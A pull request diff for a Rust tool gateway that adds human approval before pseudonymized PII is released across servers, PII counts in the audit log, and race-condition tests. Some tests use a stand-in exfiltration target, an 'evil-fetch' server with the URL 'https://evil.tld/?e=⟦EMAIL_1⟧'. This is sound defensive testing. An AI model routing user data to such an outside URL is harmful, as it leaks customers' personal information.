### PR TITLE
feat(pii): finish the DLP loop — per-call counts and a human approval path (SBS-607, SBS-696)

### DIFF
--- a/src-tauri/src/approval.rs
+++ b/src-tauri/src/approval.rs
@@ -43,6 +43,43 @@ pub enum ApprovalReason {
     UntrustedSource,
     /// Both of the above.
     DestructiveAndUntrusted,
+    /// The call carries a pseudonym minted by a DIFFERENT server, so dispatching it would
+    /// hand one server's data to another (SBS-696). Never produced by [`gate_reason`]: this
+    /// gate is not about the tool at all, it is about a specific value's destination, and it
+    /// fires even when HITL gating is off -- the alternative is not "the call runs", it is
+    /// "the call fails", so the prompt can only turn a certain failure into a possible
+    /// success.
+    PiiCrossServer,
+}
+
+/// A request to release specific pseudonymized values to a server that did not produce them.
+///
+/// Carries REAL values. That is the point -- a person cannot judge "may this address go to
+/// the mail server?" without seeing the address - and it is safe only because the broker is
+/// loopback-only, in-memory, and already the one audience that sees real arguments before
+/// dispatch. It must never be logged, persisted, or relayed to the model.
+#[derive(Debug, Clone, Serialize, Deserialize)]
+#[serde(rename_all = "camelCase")]
+pub struct PiiReleaseRequest {
+    /// The server that would receive the values, and that no value below came from.
+    pub server: String,
+    /// Every refused value in this call. Approval covers exactly this set, for exactly
+    /// this destination.
+    pub values: Vec<PiiReleaseValue>,
+}
+
+/// One value a [`PiiReleaseRequest`] would release.
+#[derive(Debug, Clone, Serialize, Deserialize)]
+#[serde(rename_all = "camelCase")]
+pub struct PiiReleaseValue {
+    /// The pseudonym as the model sees it, e.g. `⟦EMAIL_1⟧`.
+    pub token: String,
+    /// The real value behind it. Local approver only.
+    pub value: String,
+    /// The servers that already hold it, so the approver can see where it came from --
+    /// releasing to a server that already has the value is a different decision from
+    /// releasing to one that has never seen it.
+    pub origins: Vec<String>,
 }
 
 /// A request from a gateway to the broker: "a human should approve this call." The arguments
@@ -73,6 +110,10 @@ pub struct ApprovalRequest {
     /// cannot do so itself. Absent for ordinary tool approvals.
     #[serde(default, skip_serializing_if = "Option::is_none")]
     pub url_elicitation: Option<UrlElicitationRequest>,
+    /// Pseudonymized values this call would send to a server that never produced them.
+    /// Present only for [`ApprovalReason::PiiCrossServer`]; absent for ordinary approvals.
+    #[serde(default, skip_serializing_if = "Option::is_none")]
+    pub pii_release: Option<PiiReleaseRequest>,
 }
 
 /// The already-screened browser interaction carried over the local broker. The gateway
@@ -227,6 +268,7 @@ mod tests {
             arguments: serde_json::json!({ "table": "users" }),
             tool_fingerprint: Some("v2:abc".into()),
             url_elicitation: None,
+            pii_release: None,
         };
         let round: ApprovalRequest =
             serde_json::from_str(&serde_json::to_string(&req).unwrap()).unwrap();

--- a/src-tauri/src/approval_broker.rs
+++ b/src-tauri/src/approval_broker.rs
@@ -27,8 +27,8 @@ use tauri::{AppHandle, Emitter, Manager};
 use tauri_plugin_notification::NotificationExt;
 
 use crate::approval::{
-    ApprovalDecision, ApprovalReason, ApprovalRequest, EndpointDescriptor, UrlElicitationRequest,
-    DEFAULT_TIMEOUT_SECS, ENDPOINT_FILE,
+    ApprovalDecision, ApprovalReason, ApprovalRequest, EndpointDescriptor, PiiReleaseRequest,
+    UrlElicitationRequest, DEFAULT_TIMEOUT_SECS, ENDPOINT_FILE,
 };
 
 /// A pending approval as the UI sees it. The auth token is deliberately NOT included.
@@ -44,6 +44,10 @@ pub struct PendingView {
     pub arguments: serde_json::Value,
     #[serde(skip_serializing_if = "Option::is_none")]
     pub url_elicitation: Option<UrlElicitationRequest>,
+    /// Real values this call would release to a server that never produced them, for the
+    /// approver to look at. Never persisted and never sent anywhere but this local UI.
+    #[serde(skip_serializing_if = "Option::is_none")]
+    pub pii_release: Option<PiiReleaseRequest>,
     /// Wall-clock epoch-millis when this call auto-denies (park time + the fail-closed
     /// timeout). The UI counts down to this exactly, instead of approximating from when
     /// it first saw the request. App and broker share one clock, so it's accurate.
@@ -377,7 +381,11 @@ fn preflight(
     // Legacy broad `server/tool` entries are intentionally ignored: a tool definition that
     // changed since approval should re-prompt instead of inheriting a stale bypass. A
     // request with no fingerprint at all likewise never auto-approves.
-    if req.url_elicitation.is_none() {
+    // A PII release is excluded for a stronger reason than a URL elicitation: the allow key
+    // binds a TOOL definition, and "this tool may run unprompted" is not consent to hand a
+    // particular customer's address to a server that never had it. Auto-approving here would
+    // let one earlier "always allow" quietly release every future value to that server.
+    if req.url_elicitation.is_none() && req.pii_release.is_none() {
         if let Some(fp) = req.tool_fingerprint.as_deref() {
             let key = crate::approval::fingerprint_allow_key(&req.server, &req.tool, fp);
             if is_allowed(&key) {
@@ -445,6 +453,7 @@ fn handle_conn(stream: TcpStream, broker: ApprovalBroker, app: AppHandle) {
         reason: req.reason,
         arguments: req.arguments.clone(),
         url_elicitation: req.url_elicitation.clone(),
+        pii_release: req.pii_release.clone(),
         // Stamp the deadline now, right before we park on `recv_timeout` below.
         deadline_ms: deadline_ms_from_now(),
     };
@@ -572,6 +581,7 @@ mod tests {
             reason: ApprovalReason::Destructive,
             arguments: serde_json::json!({}),
             url_elicitation: None,
+            pii_release: None,
             deadline_ms: deadline_ms_from_now(),
         };
         b.inner
@@ -688,6 +698,7 @@ mod tests {
             arguments: serde_json::json!({}),
             tool_fingerprint: fingerprint.map(str::to_string),
             url_elicitation: None,
+            pii_release: None,
         }
     }
 
@@ -760,6 +771,29 @@ mod tests {
             preflight(&request("bad", None), "tok", every_key),
             Preflight::Deny
         );
+    }
+
+    #[test]
+    fn preflight_never_auto_approves_a_pii_release() {
+        // SBS-696: the allow key binds a TOOL DEFINITION. "This tool may run unprompted" is
+        // not consent to hand a specific customer's address to a server that never had it,
+        // so an existing allow must not silently release every later value to it.
+        let mut req = request("tok", Some("v2:abc"));
+        req.reason = ApprovalReason::PiiCrossServer;
+        req.pii_release = Some(crate::approval::PiiReleaseRequest {
+            server: "mailer".into(),
+            values: vec![crate::approval::PiiReleaseValue {
+                token: "⟦EMAIL_1⟧".into(),
+                value: "ada@example.com".into(),
+                origins: vec!["crm".into()],
+            }],
+        });
+
+        // Every key allowed, and it still asks.
+        assert_eq!(preflight(&req, "tok", |_: &str| true), Preflight::AskHuman);
+        // Authentication still comes first.
+        req.token = "bad".into();
+        assert_eq!(preflight(&req, "tok", |_: &str| true), Preflight::Deny);
     }
 
     #[test]

--- a/src-tauri/src/audit.rs
+++ b/src-tauri/src/audit.rs
@@ -62,6 +62,23 @@ pub fn record_timed(
     record_timed_with_hash(server, tool, ok, duration_ms, error, client, None);
 }
 
+/// One pseudonymization pass's outcome, recorded so a reader can tell whether PII
+/// redaction did anything on this call -- and, far more importantly, when it did not
+/// fully apply.
+///
+/// Only the COUNT is ever recorded. The values are the entire point of the feature and
+/// must not reach this append-only log, which already holds only an `argsHash` for the
+/// same reason.
+#[derive(Debug, Clone, Copy, PartialEq, Eq)]
+pub struct PiiPass {
+    /// How many values were replaced with tokens.
+    pub replaced: usize,
+    /// False when the pass left values in the clear: the session map hit its cap, or
+    /// the result exceeded the scan cap. This path fails OPEN by design, so an
+    /// incomplete pass is the case a governance reader most needs to see.
+    pub complete: bool,
+}
+
 /// Same as [`record_timed`], optionally attaching a canonical args hash (SOU-171 export).
 /// Never stores the arguments themselves.
 pub fn record_timed_with_hash(
@@ -73,12 +90,74 @@ pub fn record_timed_with_hash(
     client: Option<&str>,
     args_hash: Option<&str>,
 ) {
+    record_timed_with_pii(
+        server,
+        tool,
+        ok,
+        duration_ms,
+        error,
+        client,
+        args_hash,
+        None,
+    )
+}
+
+/// Same as [`record_timed_with_hash`], also recording the call's pseudonymization pass.
+///
+/// `pii` is `None` when PII redaction was off for this call, which is deliberately
+/// distinct from `Some(PiiPass { replaced: 0, .. })` -- "the feature is not on" and "the
+/// feature ran and found nothing" are different facts, and collapsing them would make a
+/// disabled feature look like a clean call (SBS-607).
+#[allow(clippy::too_many_arguments)]
+pub fn record_timed_with_pii(
+    server: &str,
+    tool: &str,
+    ok: bool,
+    duration_ms: Option<u64>,
+    error: Option<&str>,
+    client: Option<&str>,
+    args_hash: Option<&str>,
+    pii: Option<PiiPass>,
+) {
+    write_line(&timed_entry(
+        server,
+        tool,
+        ok,
+        duration_ms,
+        error,
+        client,
+        args_hash,
+        pii,
+    ));
+}
+
+/// Build the tool-call audit entry. Pure (no I/O) so the record's shape is unit-testable,
+/// like [`decision_entry`] on the approval path.
+#[allow(clippy::too_many_arguments)]
+fn timed_entry(
+    server: &str,
+    tool: &str,
+    ok: bool,
+    duration_ms: Option<u64>,
+    error: Option<&str>,
+    client: Option<&str>,
+    args_hash: Option<&str>,
+    pii: Option<PiiPass>,
+) -> Value {
     let mut entry = json!({
         "ts": epoch_millis() as u64,
         "server": server,
         "tool": tool,
         "ok": ok,
     });
+    if let Some(pass) = pii {
+        entry["piiReplaced"] = json!(pass.replaced);
+        // Written only when something WAS left in the clear, so the anomalous case is
+        // greppable in the log rather than buried in a field that is usually `false`.
+        if !pass.complete {
+            entry["piiIncomplete"] = json!(true);
+        }
+    }
     if let Some(ms) = duration_ms {
         entry["durationMs"] = json!(ms);
     }
@@ -98,7 +177,7 @@ pub fn record_timed_with_hash(
             }
         }
     }
-    write_line(&entry);
+    entry
 }
 
 /// Record a destructive call that was held for confirmation. This is the
@@ -589,6 +668,11 @@ const CSV_COLUMNS: &[&str] = &[
     "heldMs",
     "action",
     "error",
+    // Appended at the END so a consumer reading the export positionally keeps working.
+    // How many values this call's result had pseudonymized, and whether any were left in
+    // the clear. Counts only -- the values never enter this log.
+    "piiReplaced",
+    "piiIncomplete",
 ];
 
 /// Render audit `entries` as CSV (RFC-4180-ish: CRLF rows, quoted cells, doubled
@@ -638,7 +722,7 @@ mod tests {
         })];
         let csv = to_csv(&entries);
         assert!(csv.starts_with(
-            "ts,server,tool,client,ok,held,kind,reason,decision,argsHash,durationMs,heldMs,action,error\r\n"
+            "ts,server,tool,client,ok,held,kind,reason,decision,argsHash,durationMs,heldMs,action,error,piiReplaced,piiIncomplete\r\n"
         ));
         assert!(csv.contains("\"gh\""));
         assert!(csv.contains("\"search\""));
@@ -826,6 +910,90 @@ mod tests {
         assert_eq!(approved["decision"], "approved");
         assert_eq!(approved["held"], false);
         assert_eq!(approved["ok"], true);
+    }
+
+    #[test]
+    fn timed_entry_records_the_pii_pass_as_a_count_and_flags_an_incomplete_one() {
+        let pass = |replaced, complete| {
+            timed_entry(
+                "crm",
+                "crm__lookup",
+                true,
+                Some(12),
+                None,
+                Some("claude"),
+                Some("deadbeef"),
+                Some(PiiPass { replaced, complete }),
+            )
+        };
+
+        // A complete pass records the count only. `piiIncomplete` is written just for the
+        // fail-open case, so its absence is the "fully applied" signal.
+        let clean = pass(3, true);
+        assert_eq!(clean["piiReplaced"], 3);
+        assert!(clean.get("piiIncomplete").is_none());
+
+        // The fail-open case is the one a reader must be able to see: values reached the
+        // model in the clear even though redaction was on.
+        let leaky = pass(2, false);
+        assert_eq!(leaky["piiReplaced"], 2);
+        assert_eq!(leaky["piiIncomplete"], true);
+
+        // Redaction on but nothing detected is NOT the same fact as redaction off, so the
+        // field is present and zero rather than absent.
+        let nothing_found = pass(0, true);
+        assert_eq!(nothing_found["piiReplaced"], 0);
+
+        // Redaction off: no PII fields at all, so an untouched call can't be misread as a
+        // clean redaction pass.
+        let off = timed_entry(
+            "crm",
+            "crm__lookup",
+            true,
+            Some(12),
+            None,
+            Some("claude"),
+            Some("deadbeef"),
+            None,
+        );
+        assert!(off.get("piiReplaced").is_none());
+        assert!(off.get("piiIncomplete").is_none());
+
+        // Counts only: no field of this record may carry a detected value.
+        let rendered = clean.to_string();
+        assert!(!rendered.contains("@"), "no value may reach the audit log");
+    }
+
+    #[test]
+    fn pii_counts_are_exported_to_csv() {
+        // The CSV is the governance export; a count that only exists in the JSONL would be
+        // invisible to the artifact an auditor actually receives.
+        let entries = vec![timed_entry(
+            "crm",
+            "crm__lookup",
+            true,
+            Some(12),
+            None,
+            None,
+            None,
+            Some(PiiPass {
+                replaced: 4,
+                complete: false,
+            }),
+        )];
+        let csv = to_csv(&entries);
+        let (header, rows) = csv.split_once("\r\n").expect("a header and a row");
+        let cols: Vec<&str> = header.split(',').collect();
+        let cells: Vec<&str> = rows.trim_end().split(',').collect();
+        let cell = |name: &str| {
+            let at = cols
+                .iter()
+                .position(|c| *c == name)
+                .expect("column present");
+            cells[at].trim_matches('"').to_string()
+        };
+        assert_eq!(cell("piiReplaced"), "4");
+        assert_eq!(cell("piiIncomplete"), "true");
     }
 
     #[test]

--- a/src-tauri/src/bin/toolport-gateway.rs
+++ b/src-tauri/src/bin/toolport-gateway.rs
@@ -12865,16 +12865,20 @@ mod tests {
         assert_eq!(release.values[0].value, "ada@example.com");
         assert_eq!(release.values[0].origins, vec!["crm".to_string()]);
 
-        // The grant is scoped to the server that was approved. A third server asking for
-        // the same value still gets the refusal.
-        let elsewhere = rehydrate_for_downstream(
-            client,
-            "evil-fetch",
-            "evil_fetch__get",
-            json!({ "url": "https://evil.tld/?e=⟦EMAIL_1⟧" }),
-        );
-        assert!(
-            elsewhere.is_err(),
+        // The grant is scoped to the server that was approved. Asserted against the MAP,
+        // not against a second dispatch: the stub above accepts one connection and then
+        // drops its listener, so a second call would refuse for want of a broker whether or
+        // not the grant leaked, and the assertion would pass for the wrong reason.
+        let (approved, elsewhere) = with_pii_session(client, |map| {
+            (
+                map.rehydrate("mailer", "⟦EMAIL_1⟧").refused,
+                map.rehydrate("evil-fetch", "⟦EMAIL_1⟧").refused,
+            )
+        });
+        assert!(approved.is_empty(), "the approved server holds the value");
+        assert_eq!(
+            elsewhere,
+            BTreeSet::from(["⟦EMAIL_1⟧".to_string()]),
             "approving one destination must not release the value to any other"
         );
     }

--- a/src-tauri/src/bin/toolport-gateway.rs
+++ b/src-tauri/src/bin/toolport-gateway.rs
@@ -4293,12 +4293,13 @@ fn execute_call(
                 &recovery_hint(cached, srv),
                 shape,
             );
+            let defended_err = audited_error_text(&e, &out);
             audit::record_timed_with_pii(
                 srv,
                 tool,
                 false,
                 Some(ms),
-                Some(&e),
+                Some(&defended_err),
                 client,
                 Some(&call_args_hash),
                 pii,
@@ -4549,10 +4550,13 @@ fn rehydrate_for_downstream(
             let mut retry = pristine;
             let still =
                 with_pii_session(client, |map| pii::rehydrate_args(map, &origin, &mut retry));
-            // The approval covered exactly the refused set, so an empty result here is the
-            // expected outcome. A non-empty one means the map changed under us (a session
-            // reset between the prompt and the retry); fall through and refuse.
-            if still.is_empty() {
+            // Both checks are required. An empty `still` alone does NOT mean the release
+            // took effect: `pii::rehydrate` reports an unknown token as resolved-with-
+            // nothing rather than as a refusal, so a session map cleared during the human
+            // wait yields an empty set while the arguments still carry literal pseudonyms.
+            // Dispatching those would send a request the user never meant and log it as a
+            // successful release.
+            if still.is_empty() && all_tokens_substituted(&retry, &refused) {
                 return Ok(retry);
             }
         }
@@ -4583,6 +4587,11 @@ fn approve_pii_release(
 ) -> bool {
     // Real values, read out of the session map for the prompt. They go to the loopback
     // broker and nowhere else -- not the audit record below, not the model.
+    //
+    // These are also the binding record of WHAT was approved. The human decision takes up
+    // to two minutes, and the map can be cleared and re-minted by another session on
+    // another thread in that window, so the same token can stand for a different person by
+    // the time the answer arrives.
     let values: Vec<approval::PiiReleaseValue> = with_pii_session(client, |map| {
         refused
             .iter()
@@ -4616,7 +4625,9 @@ fn approve_pii_release(
         url_elicitation: None,
         pii_release: Some(approval::PiiReleaseRequest {
             server: server.to_string(),
-            values,
+            // Cloned: the originals stay here as the record of what was on screen, to be
+            // re-checked against the map once the answer comes back.
+            values: values.clone(),
         }),
     });
     // The audit record names the tokens' count via the args hash only -- `record_decision`
@@ -4634,12 +4645,58 @@ fn approve_pii_release(
         return false;
     }
     let origin = pii_origin_id(server);
+    // Bind the grant to the VALUES the human was shown, not merely to the token ids. If a
+    // token now stands for someone else -- or for nothing, because the map was cleared --
+    // the approval on screen was for a different question, and widening origins on it
+    // would release a value nobody ever saw.
+    //
+    // Verified in full before anything is granted, under one lock: a partial grant would
+    // leave origins widened for a release the caller then refuses.
     with_pii_session(client, |map| {
-        for token in refused {
-            map.approve_origin(token, &origin);
+        let unchanged = values.iter().all(|shown| {
+            map.disclose(&shown.token)
+                .is_some_and(|now| now.value == shown.value)
+        });
+        if !unchanged {
+            return false;
         }
-    });
-    true
+        values
+            .iter()
+            .all(|shown| map.approve_origin(&shown.token, &origin))
+    })
+}
+
+/// The text a failed call is audited under.
+///
+/// The DEFENDED body, not `raw`. A downstream error is attacker-controlled and routinely
+/// echoes the arguments, so it can carry the very values the PII pass just removed from
+/// `defended` -- and the audit row now asserts `piiReplaced` beside it (SBS-607). Logging
+/// the raw string there would put an address in the append-only log while claiming
+/// redaction ran.
+///
+/// Falls back to `raw` only when the defended body has no text at all, so a failure is
+/// never audited with an empty reason.
+fn audited_error_text(raw: &str, defended: &Value) -> String {
+    let text = content_text(defended);
+    if text.trim().is_empty() {
+        raw.to_string()
+    } else {
+        text
+    }
+}
+
+/// True when none of `tokens` still appears literally in `value`.
+///
+/// The post-approval check an empty refused set cannot make on its own:
+/// [`pii::SessionMap::rehydrate`] deliberately reports an UNKNOWN token as
+/// resolved-with-nothing rather than as a refusal (the model may echo a token from another
+/// session, and there is no value behind it to leak). So a map cleared mid-approval yields
+/// "nothing refused" over arguments that still carry literal pseudonyms.
+fn all_tokens_substituted(value: &Value, tokens: &std::collections::BTreeSet<String>) -> bool {
+    let rendered = value.to_string();
+    tokens
+        .iter()
+        .all(|token| !rendered.contains(token.as_str()))
 }
 
 /// The same resolve-and-refuse pass as [`rehydrate_for_downstream`], for the MRTR
@@ -4696,17 +4753,25 @@ fn rehydrate_mrtr_for_downstream(
         if approve_pii_release(client, server, tool, &refused, &shown) {
             let mut retry = mrtr.clone();
             let still = pass(&mut retry);
-            if still.is_empty() {
+            // Same two-part check as the arguments path: an empty refused set does not by
+            // itself prove the release landed, because an unknown token resolves to
+            // nothing rather than refusing.
+            let substituted = [&retry.input_responses, &retry.request_state]
+                .into_iter()
+                .flatten()
+                .all(|field| all_tokens_substituted(field, &refused));
+            if still.is_empty() && substituted {
                 return Ok(Some(retry));
             }
-            refused = still;
+            refused = if still.is_empty() { refused } else { still };
         }
     }
     if !refused.is_empty() {
         let list = refused.into_iter().collect::<Vec<_>>().join(", ");
         return Err(format!(
             "refusing to send redacted values to '{server}' in a retry response: {list} came from \
-             a different server. Toolport only returns a value to the server that provided it."
+             a different server. Toolport only returns a value to the server that provided it. \
+             Approve the release in the Toolport app to allow it."
         ));
     }
     Ok(Some(out))
@@ -12674,6 +12739,20 @@ mod tests {
         dir: &std::path::Path,
         decision: approval::ApprovalDecision,
     ) -> std::sync::mpsc::Receiver<approval::ApprovalRequest> {
+        stub_broker_with(dir, decision, || {})
+    }
+
+    /// [`stub_broker`], but running `during` after the request is read and BEFORE the
+    /// decision is written.
+    ///
+    /// That window is the real one: the human decision takes up to two minutes, and
+    /// another MCP session can clear or re-mint the map on another thread while it is open.
+    /// Running the mutation here reproduces it deterministically instead of by timing.
+    fn stub_broker_with(
+        dir: &std::path::Path,
+        decision: approval::ApprovalDecision,
+        during: impl FnOnce() + Send + 'static,
+    ) -> std::sync::mpsc::Receiver<approval::ApprovalRequest> {
         let listener = TcpListener::bind(("127.0.0.1", 0)).expect("a loopback port");
         let endpoint = listener.local_addr().expect("a bound address").to_string();
         std::fs::write(
@@ -12700,6 +12779,7 @@ mod tests {
             if let Ok(req) = serde_json::from_str::<approval::ApprovalRequest>(&line) {
                 let _ = tx.send(req);
             }
+            during();
             let mut stream = stream;
             let answer = serde_json::to_string(&decision).expect("a serializable decision");
             let _ = stream.write_all(answer.as_bytes());
@@ -12828,6 +12908,94 @@ mod tests {
     }
 
     #[test]
+    fn all_tokens_substituted_rejects_a_pass_that_left_pseudonyms_behind() {
+        // Defense in depth on the release retry. The grant checks above catch the cases we
+        // can drive deterministically; this guards the residual window where the map moves
+        // between the grant and the retry, which no test can schedule. Pinned directly so
+        // it cannot be quietly weakened.
+        let tokens = BTreeSet::from(["⟦EMAIL_1⟧".to_string(), "⟦PHONE_1⟧".to_string()]);
+        assert!(all_tokens_substituted(
+            &json!({ "to": "ada@example.com", "cc": "+15551234567" }),
+            &tokens
+        ));
+        // Anywhere in the tree counts, and one survivor is enough to refuse.
+        assert!(!all_tokens_substituted(
+            &json!({ "to": "ada@example.com", "body": { "x": ["⟦PHONE_1⟧"] } }),
+            &tokens
+        ));
+        // An empty token set is vacuously satisfied: nothing was refused, nothing to prove.
+        assert!(all_tokens_substituted(
+            &json!({ "to": "⟦EMAIL_9⟧" }),
+            &BTreeSet::new()
+        ));
+    }
+
+    #[test]
+    fn a_map_cleared_during_the_wait_refuses_instead_of_dispatching_literal_tokens() {
+        // The human wait is up to two minutes, and another MCP session can clear the map on
+        // another thread inside it. `pii::rehydrate` reports an unknown token as
+        // resolved-with-nothing rather than as a refusal, so "nothing refused" alone would
+        // wave through arguments that still read `⟦EMAIL_1⟧` — dispatching a request the
+        // user never meant and logging it as an approved release.
+        let env = pii_test_env("pii-release-cleared");
+        let client = Some("pii-release-cleared");
+        with_pii_session(client, |map| {
+            *map = pii::SessionMap::new();
+            map.pseudonymize("crm", "ada@example.com");
+        });
+        let _asked = stub_broker_with(&env.dir, approval::ApprovalDecision::Approved, || {
+            clear_pii_session(Some("pii-release-cleared"));
+        });
+
+        let err = rehydrate_for_downstream(
+            client,
+            "mailer",
+            "mailer__send",
+            json!({ "to": "⟦EMAIL_1⟧" }),
+        )
+        .expect_err("an approval over a vanished value must not dispatch");
+        assert!(err.contains("⟦EMAIL_1⟧"), "name the token: {err}");
+    }
+
+    #[test]
+    fn an_approval_does_not_release_a_value_reminted_during_the_wait() {
+        // The worst shape: the token id survives but now stands for someone else. The human
+        // said yes to ada; granting on the token id alone would hand bob to the mail server.
+        let env = pii_test_env("pii-release-reminted");
+        let client = Some("pii-release-reminted");
+        with_pii_session(client, |map| {
+            *map = pii::SessionMap::new();
+            map.pseudonymize("crm", "ada@example.com");
+        });
+        let _asked = stub_broker_with(&env.dir, approval::ApprovalDecision::Approved, || {
+            // Same token id, different person.
+            with_pii_session(Some("pii-release-reminted"), |map| {
+                *map = pii::SessionMap::new();
+                map.pseudonymize("crm", "bob@example.com");
+            });
+        });
+
+        let err = rehydrate_for_downstream(
+            client,
+            "mailer",
+            "mailer__send",
+            json!({ "to": "⟦EMAIL_1⟧" }),
+        )
+        .expect_err("the approval was for a different value");
+        assert!(
+            !err.contains("bob@example.com") && !err.contains("ada@example.com"),
+            "the refusal must not leak either value: {err}"
+        );
+        // And the re-minted value must NOT have inherited the grant.
+        let refused = with_pii_session(client, |map| map.rehydrate("mailer", "⟦EMAIL_1⟧").refused);
+        assert_eq!(
+            refused,
+            BTreeSet::from(["⟦EMAIL_1⟧".to_string()]),
+            "approving ada must never widen origins for bob"
+        );
+    }
+
+    #[test]
     fn mrtr_retry_fields_are_rehydrated_on_the_downstream_leg() {
         // SBS-606: a host that answers an elicitation from model context puts the
         // pseudonym in `inputResponses`. Relaying that literal gives the server a
@@ -12878,6 +13046,50 @@ mod tests {
 
         assert!(err.contains("⟦EMAIL_1⟧"), "name the token: {err}");
         assert!(!err.contains("ada@example.com"), "must not leak: {err}");
+        // The remedy has to be named here too, or a host answering an elicitation with a
+        // foreign token looks permanently dead-ended even with the desktop app running.
+        assert!(
+            err.contains("Approve the release in the Toolport app"),
+            "point at the release approval: {err}"
+        );
+    }
+
+    #[test]
+    fn a_pii_bearing_downstream_error_is_audited_defended_not_raw() {
+        // SBS-607 threads a `piiReplaced` onto the error path's audit row. That claim sits
+        // beside the `error` field, so auditing the RAW downstream error would put an
+        // address in the append-only log while asserting redaction ran.
+        let mut reg = Registry::default();
+        reg.pii_redaction = true;
+        let client = Some("pii-error-audit");
+        with_pii_session(client, |map| *map = pii::SessionMap::new());
+
+        // The shape execute_call builds for a failed downstream call.
+        let raw = "connect failed for ada@example.com";
+        let defended = defend_and_shape(
+            &reg,
+            "crm",
+            "crm__lookup",
+            client,
+            json!({ "content": [{ "type": "text", "text": raw }], "isError": true }),
+            "",
+            true,
+        );
+        let pass = defended.pii.expect("redaction is on");
+        assert_eq!(pass.replaced, 1, "the error text carried one address");
+
+        let audited = audited_error_text(raw, &defended.result);
+        assert!(
+            !audited.contains("ada@example.com"),
+            "the audited text must be the pseudonymized one: {audited}"
+        );
+        assert!(
+            audited.contains("⟦EMAIL_1⟧"),
+            "and it must still say what failed: {audited}"
+        );
+
+        // A defended body with no text at all still audits a reason rather than nothing.
+        assert_eq!(audited_error_text(raw, &json!({ "content": [] })), raw);
     }
 
     #[test]

--- a/src-tauri/src/bin/toolport-gateway.rs
+++ b/src-tauri/src/bin/toolport-gateway.rs
@@ -3869,6 +3869,7 @@ fn execute_call(
                 arguments: rehydrated_for_local_approver(reg, client, srv, &arguments),
                 tool_fingerprint: current_fp.clone(),
                 url_elicitation: None,
+                pii_release: None,
             };
             let mut approval_reason = reason;
             let (decision, held_ms, approved_fp, audit_approval) = if modern_direct_call {
@@ -3972,6 +3973,10 @@ fn execute_call(
                 approval::ApprovalReason::Destructive => "destructive",
                 approval::ApprovalReason::UntrustedSource => "untrusted_source",
                 approval::ApprovalReason::DestructiveAndUntrusted => "destructive_and_untrusted",
+                // Unreachable here: this gate comes from `gate_reason`, which never returns
+                // it. The PII release gate runs later, at the dispatch boundary, and audits
+                // itself in `approve_pii_release`.
+                approval::ApprovalReason::PiiCrossServer => "pii_cross_server",
             };
             if !decision.is_approved() {
                 // Governance audit: the gate reason and which non-approval outcome
@@ -4162,7 +4167,7 @@ fn execute_call(
     // Scoped to the executing server (SBS-605): a token only resolves for a server
     // that already produced that value. Anything else is refused here rather than
     // dispatched, which is what closes the cross-server exfiltration path.
-    let arguments = match rehydrate_for_downstream(client, srv, arguments) {
+    let arguments = match rehydrate_for_downstream(client, srv, name, arguments) {
         Ok(args) => args,
         Err(msg) => {
             return json!({
@@ -4179,7 +4184,7 @@ fn execute_call(
     // rehydration on the same leg. A host that answers an elicitation from model
     // context puts `⟦EMAIL_1⟧` in `inputResponses`, and the server would receive a
     // pseudonym where an address belongs (SBS-606).
-    let rehydrated_mrtr = match rehydrate_mrtr_for_downstream(client, srv, effective_mrtr) {
+    let rehydrated_mrtr = match rehydrate_mrtr_for_downstream(client, srv, name, effective_mrtr) {
         Ok(m) => m,
         Err(msg) => {
             return json!({
@@ -4514,24 +4519,127 @@ fn with_pii_session<T>(client: Option<&str>, f: impl FnOnce(&mut pii::SessionMap
 /// putting a CRM's email in a URL for some unrelated fetch tool — so it fails the
 /// call instead of dispatching. Dispatching the literal token instead would leak
 /// nothing, but it would also silently send a request the user never meant.
+/// A refusal is not final: a human is asked whether to release the named values to this
+/// server, and on approval the pass is re-run (SBS-696). With no one to ask the refusal
+/// stands, which is why headless deployments keep exactly the old behaviour.
 fn rehydrate_for_downstream(
     client: Option<&str>,
     server: &str,
+    tool: &str,
     mut arguments: Value,
 ) -> Result<Value, String> {
     let origin = pii_origin_id(server);
-    let refused = with_pii_session(client, |map| {
-        pii::rehydrate_args(map, &origin, &mut arguments)
+    // A retry after approval must start from the ORIGINAL arguments: the first pass
+    // resolved this server's own tokens in place, and re-running over its output would be
+    // rehydrating already-rehydrated text. Held only when the map has something a pass
+    // could refuse, so the ordinary no-PII call does not pay for a clone.
+    let (pristine, refused) = with_pii_session(client, |map| {
+        if map.is_empty() {
+            return (None, std::collections::BTreeSet::new());
+        }
+        let pristine = arguments.clone();
+        let refused = pii::rehydrate_args(map, &origin, &mut arguments);
+        (Some(pristine), refused)
     });
-    if !refused.is_empty() {
-        let list = refused.into_iter().collect::<Vec<_>>().join(", ");
-        return Err(format!(
-            "refusing to send redacted values to '{server}': {list} came from a different server. \
-             Toolport only returns a value to the server that provided it, so one server's data \
-             cannot be routed to another."
-        ));
+    if refused.is_empty() {
+        return Ok(arguments);
     }
-    Ok(arguments)
+    if let Some(pristine) = pristine {
+        if approve_pii_release(client, server, tool, &refused, &pristine) {
+            let mut retry = pristine;
+            let still =
+                with_pii_session(client, |map| pii::rehydrate_args(map, &origin, &mut retry));
+            // The approval covered exactly the refused set, so an empty result here is the
+            // expected outcome. A non-empty one means the map changed under us (a session
+            // reset between the prompt and the retry); fall through and refuse.
+            if still.is_empty() {
+                return Ok(retry);
+            }
+        }
+    }
+    let list = refused.into_iter().collect::<Vec<_>>().join(", ");
+    Err(format!(
+        "refusing to send redacted values to '{server}': {list} came from a different server. \
+         Toolport only returns a value to the server that provided it, so one server's data \
+         cannot be routed to another. Approve the release in the Toolport app to allow it."
+    ))
+}
+
+/// Ask a human whether `refused` may be released to `server`, and record the grant.
+///
+/// Returns true only on an explicit approval, having already widened each token's origins
+/// so the caller's retry resolves. Every other outcome -- denied, no answer, and above all
+/// no reachable broker -- is false and leaves the map untouched.
+///
+/// The unreachable case is the headless answer the issue asks for: `request_human_decision`
+/// returns `Unreachable` when the desktop app is not running, so a gateway with nobody to
+/// ask refuses exactly as it did before this existed.
+fn approve_pii_release(
+    client: Option<&str>,
+    server: &str,
+    tool: &str,
+    refused: &std::collections::BTreeSet<String>,
+    arguments: &Value,
+) -> bool {
+    // Real values, read out of the session map for the prompt. They go to the loopback
+    // broker and nowhere else -- not the audit record below, not the model.
+    let values: Vec<approval::PiiReleaseValue> = with_pii_session(client, |map| {
+        refused
+            .iter()
+            .filter_map(|token| {
+                map.disclose(token).map(|d| approval::PiiReleaseValue {
+                    token: token.clone(),
+                    value: d.value.to_string(),
+                    origins: d.origins.iter().cloned().collect(),
+                })
+            })
+            .collect()
+    });
+    // A token that no longer discloses means the session map was cleared between the
+    // refusal and here. Asking about a value we can no longer name would be meaningless.
+    if values.len() != refused.len() {
+        return false;
+    }
+
+    let started = Instant::now();
